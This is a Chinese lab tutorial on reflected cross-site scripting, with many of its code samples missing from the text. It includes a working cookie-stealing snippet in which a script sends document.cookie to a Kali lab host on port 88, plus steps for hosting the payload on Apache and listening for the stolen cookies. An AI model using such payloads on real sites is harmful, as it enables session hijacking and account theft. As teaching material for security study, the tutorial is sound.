二十五、XSS跨站攻击-(1)简介及常见攻击手段

                                   目录

1. 攻击WEB客户端
2. 客户端脚本语言
3. XSS（cross-site scripting）
4. 使用场景
5. 攻击参与方
6. 漏洞形成的根源
7. XSS漏洞类型
8. 反射型XSS实验
   8.1 初试XSS
   8.2 基于html事件类型
   8.2.1 基于标签超链接
   8.2.2 基于网页中链接图片
   8.2.3 重定向
   8.2.4 iframe框架
   8.2.5 盗取cookie
   8.2.6 篡改主页
   8.2.7 一般JavaScript攻击方法

1.攻击WEB客户端

之前的内容基本都是针对服务端的，而xss是在客户端作为攻击对象，一般不能实现对客户端的完全控制，尽管其漏洞在服务端；
VBScript针对微软的浏览器、ActiveX 、Flash、Javascript客户端执行工具/语言。

2.客户端脚本语言

• 弹窗告警、广告 //比如输入格式不合格
• Javascript
• 在浏览器中执行

3.XSS（cross-site scripting）

• 通过WEB站点漏洞，向客户端交付恶意脚本基本代码，实现对客户端的攻击目的
• 注入客户端脚本代码
• 盗取cookie
• 重定向 //本来访问正常站点，但却访问了另一个被黑客伪造的站点，输入了账号、密码
• 其他客户端脚本：VBScript（仅限于微软自己的浏览器）、ActiveX

4.使用场景

• 直接嵌入html：
• 元素标签事件： 页面被加载时执行javascript
• 图片标签： //插入一张图片，默认为图片路径，但也可以是js
• 其他标签：
  

  iframe
  

  监听结果

  8.2.5 盗取cookie

  
  //将被攻击者的cookie信息发送到攻击者手中，通过诱使被攻击者点击此链接
  

  

  盗取被攻击者cookie

  8.2.6 篡改主页

  此次篡改主页是基于反射型xss，而不是存储型

  
  //插入一段html，并显示“this website is under attack”
  

  

  篡改主页
  

  篡改效果

  8.2.7一般JavaScript攻击方法

  正常情况下，黑客不会向上述那样，发一大段链接给被攻击者去点击，那样的话，如果内容足够多、或者包含一些如cookie字符的话容易被发现。通常会发一个简短的js，然后指向到另一个地址去拿真正的js

    //此段为注入的内容，依赖于第三方服务器，在这用kali本机地址
  

  首先，在本机上的/var/www/html/目录下创建a.js文件，并开启apache正常访问

  var img = new Image();
  img.src = "http://192.168.50.115:88/cookies.php?cookie="+document.cookie;
  

  (1)创建a.js

  
  
  

  创建a.js
  
  

  (2)启动apache

  # service apache2 start
  

  (3)访问http://192.168.50.115/a.js正常
  

  

  正常访问a.js

  (4) 插入下面代码

  (5)开启监听88端口

  
  
  

  开启监听

  (6)执行，并查看监听结果

  
  
  

  点击执行
  

  获取cookie